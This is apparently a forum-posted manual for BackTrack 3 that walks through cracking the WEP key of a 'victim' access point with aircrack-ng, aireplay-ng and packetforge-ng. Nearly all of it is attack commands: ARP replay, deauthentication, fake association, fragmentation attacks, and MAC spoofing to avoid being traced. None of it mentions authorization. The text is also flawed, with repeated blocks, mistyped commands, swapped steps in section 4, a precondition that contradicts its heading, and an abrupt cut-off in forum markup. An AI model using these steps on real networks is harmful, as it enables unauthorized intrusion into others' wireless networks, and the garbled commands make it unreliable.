How To BT3
BT3 Crack WEP WPA Manual0. Make bootable USB
Format USB to fat32 under windows system.
Mount bt3-usb.iso.
Copy boot and BT3 folders into USB.
Run boot/bootinst.bat
OK.
Login into BT3 system (KDE)
Use: root
Pwd: toor
OK? Try this.
#startx
OK? Try this again.
#xconfig
#startx
Note
If the execution of the command not return immediately, just open a new shell to execute the next command.
Wireless Net Card WNC, yourself wireless net card.
Access Point AP, the victim.
1. CRACK OPEN WEP WITH VALID CLIENT ARP
Precondition
AP use WEP encrypting.
AP is Open model.
AP has valid client.
AP client can only generate valid ARP data.
Open the wireless switch of your laptop.
Step1. Unload iwl3945 driver for Intel3945 wireless net card driver(WNC).
#modprobe –r iwl3945
Step2. Load monitorable WNC driver for Intel3945. Different WNC has different loading procedure.
#modeprobe ipwraw
#airmon-ng
#modinfo ipwraw
Step3. Search AP. After you get the info (ESSID, MAC, Having client or not, Client MAC), you should Ctrl+C close the searching program.
#airodump-ng wifi0
Suppose we get a AP as following
AP MAC
00:00:00:00:00:00
AP ESSID
tenda
AP Channel
11
AP Client MAC
CC:CC:CC:CC:CC:CC
Step4. Optioal. For the safety, change yourself WNC MAC. As 11:11:11:11:11:11
#macchanger –m 11:11:11:11:11:11 wifi0
Step5. Activate the wifi0 and let it work on channel of AP.
#airmon-ng start wifi0 11
Optioal. Show wifi0 working model and wording channel
#iwconfi wifi0
Optioal. Test injection ability of yourself WNC.
#aireplay-ng -9 wifi0
Step6. Crack out the password of AP now.
#wesside-ng -i wifi0 –v 00:00:00:00:00:00
2. CRACK OPEN WEP WITH LOTS OF VALID CLIENT IVS DATA
Precondition
AP use WEP encrypting.
AP is Open model.
AP has valid client.
AP client can generate plenty of valid data.
We can get lots of ivs data from AP client.
Open the wireless switch of your laptop.
Step1. Unload iwl3945 driver for Intel3945 wireless net card driver(WNC).
#modprobe –r iwl3945
Step2. Load monitorable WNC driver for Intel3945. Different WNC has different loading procedure.
#modeprobe ipwraw
#airmon-ng
#modinfo ipwraw
Step3. Search AP. After you get the info (ESSID, MAC, Having client or not, Client MAC), you should Ctrl+C close the searching program.
#airodump-ng wifi0
Suppose we get a AP as following:
AP MAC
00:00:00:00:00:00
AP ESSID
tenda
AP Channel
11
AP Client MAC
CC:CC:CC:CC:CC:CC
Step4. For the safety, change yourself WNC MAC. As 11:11:11:11:11:11
#macchanger –m 11:11:11:11:11:11 wifi0
Step5. Activate the wifi0 and let it work on channel
#airmon-ng start wifi0 11
Show wifi0 working model and wording channel
#iwconfi wifi0
Test injection ability of yourself WNC.
#aireplay-ng -9 wifi0
Step6. Get ivs data file.-w <data file name> -c <channel>
#airodump-ng --ivs -w dumped_data -c 11 wifi0
Step7. Crack out the password of AP now.
#aircrack-ng -n 64 -b 00:00:00:00:00:00 dumped_data-01.ivs
3. CRACK OPEN WEP WITH LESS VALID CLIENT IVS DATA
Precondition
AP use WEP encrypting.
AP is Open model.
AP has valid client.
AP client can generate less valid ivs data.
Open the wireless switch of your laptop.
Step1. Unload iwl3945 driver for Intel3945 wireless net card driver(WNC).
#modprobe –r iwl3945
Step2. Load monitorable WNC driver for Intel3945. Different WNC has different loading procedure.
#modeprobe ipwraw
#airmon-ng
#modinfo ipwraw
Step3. Search AP. After you get the info (ESSID, MAC, Having client or not, Client MAC), you should Ctrl+C close the searching program.
#airodump-ng wifi0
Suppose we get a AP as following:
AP MAC
00:00:00:00:00:00
AP ESSID
tenda
AP Channel
11
AP Client MAC
CC:CC:CC:CC:CC:CC
Step4. For the safety, change yourself WNC MAC. As 11:11:11:11:11:11
#macchanger –m 11:11:11:11:11:11 wifi0
Step5. Activate the wifi0 and let it work on channel
#airmon-ng start wifi0 11
Show wifi0 working model and wording channel
#iwconfi wifi0
Test injection ability of yourself WNC.
#aireplay-ng -9 wifi0
Step6. Get ivs data file.-w <data file name> -c <channel>
#airodump-ng --ivs -w dumped_data -c 11 wifi0
Step7. Using ARP injection to get lots of ivs data. This step may take a long time to wait for ARP. You could use another PC or laptop to connect to the AP and supply a ARP packet.
#aireplay-ng -3 -b 00:00:00:00:00:00 -h CC:CC:CC:CC:CC:CC wifi0
Step8. Crack out the password of AP now.
#aircrack-ng -n 64 -b 00:00:00:00:00:00 dumped_data-01.ivs
4. CRACK OPEN WEP WITH VALID CLIENT BUT NO COMMUNICATION
Precondition
AP use WEP encrypting.
AP is Open model.
AP has valid client.
AP client do no communication to AP.
Open the wireless switch of your laptop.
Step1. Unload iwl3945 driver for Intel3945 wireless net card driver(WNC).
#modprobe –r iwl3945
Step2. Load monitorable WNC driver for Intel3945. Different WNC has different loading procedure.
#modeprobe ipwraw
#airmon-ng
#modinfo ipwraw
Step3. Search AP. After you get the info (ESSID, MAC, Having client or not, Client MAC), you should Ctrl+C close the searching program.
#airodump-ng wifi0
Suppose we get a AP as following:
AP MAC
00:00:00:00:00:00
AP ESSID
tenda
AP Channel
11
AP Client MAC
CC:CC:CC:CC:CC:CC
Step4. For the safety, change yourself WNC MAC. As 11:11:11:11:11:11
#macchanger –m 11:11:11:11:11:11 wifi0
Step5. Activate the wifi0 and let it work on channel
#airmon-ng start wifi0 11
Show wifi0 working model and wording channel
#iwconfi wifi0
Test injection ability of yourself WNC.
#aireplay-ng -9 wifi0
Step6. Get ivs data file.-w <data file name> -c <channel>
#airodump-ng --ivs -w dumped_data -c 11 wifi0
Step7. -0 force confliction model disconnect AP and AP client and let them reconnect.
#aireplay-ng -3 -b 00:00:00:00:00:00 -h CC:CC:CC:CC:CC:CC wifi0
Step8. Make use of reconnection data of Step7 to complete ARP injection.
#aireplay-ng -0 10 –a 00:00:00:00:00:00 -c CC:CC:CC:CC:CC:CC wifi0
5. CRACK OPEN WEP WITH OUT CLIENT
Precondition
AP use WEP encrypting.
AP is Open model.
AP has valid client.
AP client do no communication to AP.
Open the wireless switch of your laptop.
Step1. Unload iwl3945 driver for Intel3945 wireless net card driver(WNC).
#modprobe –r iwl3945
Step2. Load monitorable WNC driver for Intel3945. Different WNC has different loading procedure.
#modeprobe ipwraw
#airmon-ng
#modinfo ipwraw
Step3. Search AP. After you get the info (ESSID, MAC, Having client or not, Client MAC), you should Ctrl+C close the searching program.
#airodump-ng wifi0
Suppose we get a AP as following:
AP MAC
00:00:00:00:00:00
AP ESSID
tenda
AP Channel
11
AP Client MAC
CC:CC:CC:CC:CC:CC
Step4. For the safety, change yourself WNC MAC. As 11:11:11:11:11:11
#macchanger –m 11:11:11:11:11:11 wifi0
Step5. Activate the wifi0 and let it work on channel
#airmon-ng start wifi0 11
Show wifi0 working model and wording channel
#iwconfi wifi0
Test injection ability of yourself WNC.
#aireplay-ng -9 wifi0
Step6. Get ivs data file.-w <data file name> -c <channel>
#airodump-ng --ivs -w dumped_data -c 11 wifi0
Step7. For there is no AP client, We need to create a virtual connection to AP. So, make a association from your WNC to the AP now.
#aireplay-ng -1 0 -e tenda -a 00:00:00:00:00:00 -h 11:11:11:11:11:11 wifi0
Failure Reason
AP has MAC filter.
Feeble signal from AP.
AP has WPA encryption.
Conflict between WNC and MAC. e.g. different working channel.
Try
Cancel the [–e tenda]parameter.
Set lower rate. E.g. #iwconfig wifi0 rate 2M
To confirm the virtual connection.
# tcpdump -n -e -s0 -vvv -i wifi0
There are three kind of methods to do future cracking work.
Case1
Step8. Using -2 attack model. it can do seizing data, extracting data and injecting data.
#aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 wifi0
Enter for question “Use this packet ?” to launch the attack.
After get enough ivs data, you could use aircrack-ng to do crack.
Step9. Using aircrack-ng. AS #aircrack-ng -n 64 -b 00:00:00:00:00:00 dumped_data-01.ivs
#
Case2
Step8. Get xor file that contains valid password information. The generated xor file name is start with “fragment”.
#aireplay-ng -5 -b <ap mac> -h <my mac> wifi0
Step9. Using xor file, create a fake ARP packet. –y xor_file –w fake_arp_file
#packetforge-ng -0 -a 00:00:00:00:00:00 -h 11:11:11:11:11:11 -k 255.255.255.255 –l 255.255.255.255 –y fragment-xxxx-xxxxxx.xor -w myarp
Step10. Using -2 attack model. –r fake_arp_file –x data_sent_rate, less than 1024
<span style="font-size: small;"><span style="">EN-U
页:
[1]